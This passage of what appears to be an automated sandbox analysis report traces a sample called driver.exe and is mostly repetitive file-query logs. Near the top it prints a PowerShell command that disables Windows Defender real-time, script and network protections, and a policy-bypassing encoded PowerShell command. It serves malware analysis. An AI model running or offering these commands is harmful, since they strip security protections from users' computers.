jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaia	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell set-mppreference -disableintrusionpreventionsystem $true -disableioavprotection $true -disablerealtimemonitoring $true -disablescriptscanning $true -enablecontrolledfolderaccess disabled -enablenetworkprotection auditmode -force -mapsreporting disabled -submitsamplesconsent neversend	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -noprofile -executionpolicy bypass -encodedcommand jabzag8adqbyagmazqagad0aiabaaciadqakahuacwbpag4azwagafmaeqbzahqazqbtadsadqakahuacwbpag4azwagafmaeqbzahqazqbtac4aqwbvagwabablagmadabpag8abgbzac4arwblag4azqbyagkaywa7aa0acgb1ahmaaqbuagcaiabtahkacwb0aguabqauaeqacgbhahcaaqbuagcaowanaaoadqbzagkabgbnacaauwb5ahmadablag0algbxagkabgbkag8adwbzac4argbvahiabqbzadsadqakaa0acgbwahuaygbsagkaywagagmababhahmacwagafmaywbyaguazqbuahmaaabvahqadqakahsadqakacaaiaagacaacab1agiababpagmaiabzahqayqb0agkaywagaewaaqbzahqapabcagkadabtageacaa+acaaqwbhahaadab1ahiazqbtagmacgblaguabgbzacgakqanaaoaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaadgbhahiaiabyaguacwb1agwadabzacaapqagag4azqb3acaatabpahmadaa8aeiaaqb0ag0ayqbwad4akaapadsadqakacaaiaagacaaiaagacaaiab2ageacgagageababsafmaywbyaguazqbuahmaiaa9acaauwbjahiazqblag4algbbagwababtagmacgblaguabgbzadsadqakaa0acgagacaaiaagacaaiaagacaazgbvahiazqbhagmaaaagacgauwbjahiazqblag4aiabzagmacgblaguabgagagkabgagageababsafmaywbyaguazqbuahmakqanaaoaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagahqacgb5aa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagafiazqbjahqayqbuagcabablacaaygbvahuabgbkahmaiaa9acaacwbjahiazqblag4algbcag8adqbuagqacwa7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahuacwbpag4azwagacgaqgbpahqabqbhahaaiabiagkadabtageacaagad0aiabuaguadwagaeiaaqb0ag0ayqbwacgaygbvahuabgbkahmalgbxagkazab0aggalaagagiabwb1ag4azabzac4asablagkazwboahqakqapaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiab1ahmaaqbuagcaiaaoaecacgbhahaaaabpagmacwagagcacgbhahaaaabpagmacwagad0aiabhahiayqbwaggaaqbjahmalgbgahiabwbtaekabqbhagcazqaoagiaaqb0ag0ayqbwackakqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagahsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagagcacgbhahaaaabpagmacwauaemabwbwahkargbyag8abqbtagmacgblaguabgaoag4azqb3acaauabvagkabgb0acgaygbvahuabgbkahmalgbmaguazgb0acwaiabiag8adqbuagqacwauafqabwbwackalaagafaabwbpag4adaauaeuabqbwahqaeqasacaaygbvahuabgbkahmalgbtagkaegblackaowanaaoaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaacgblahmadqbsahqacwauaeeazabkacgakabcagkadabtageacaapagiaaqb0ag0ayqbwac4aqwbsag8abgblacgakqapadsadqakacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagacaaiaagacaaywbhahqaywboacaakabfahgaywblahaadabpag8abgapaa0acgagacaaiaagacaaiaagacaaiaagacaaiab7aa0acgagacaaiaagacaaiaagacaaiaagacaaiaagacaaiaagac8alwagaegayqbuagqabablacaayqbuahkaiablahgaywblahaadabpag8abgbzacaaaablahiazqanaaoaiaagacaaiaagacaaiaagacaaiaagacaafqanaaoaiaagacaaiaagacaaiaagah0adqakaa0acgagacaaiaagacaaiaagacaacgblahqadqbyag4aiabyaguacwb1agwadabzadsadqakacaaiaagacaafqanaaoafqanaaoaigbaaa0acganaaoaqqbkagqalqbuahkacablacaalqbuahkacablaeqazqbmagkabgbpahqaaqbvag4aiaakahmabwb1ahiaywblacaalqbsaguazgblahiazqbuagmazqbkaeeacwbzaguabqbiagwaaqblahmaiab

Source: C:\Users\user\AppData\Local\Temp\_MEI57082\rar.exe

Code function: 77_2_00007FF75428B340 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,

77_2_00007FF75428B340

Source: C:\Users\user\Desktop\driver.exe

Code function: 0_2_00007FF6A29D95E0 cpuid

0_2_00007FF6A29D95E0

Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\ucrtbase.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_ctypes.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\blank.aes VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_lzma.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_bz2.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_sqlite3.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_socket.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\select.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_ssl.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082 VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\_hashlib.pyd VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\_MEI57082\base_library.zip VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\driver.exe	Queries volume information: C:\Users\user\Desktop\driver.exe VolumeInformation	Jump to behavior
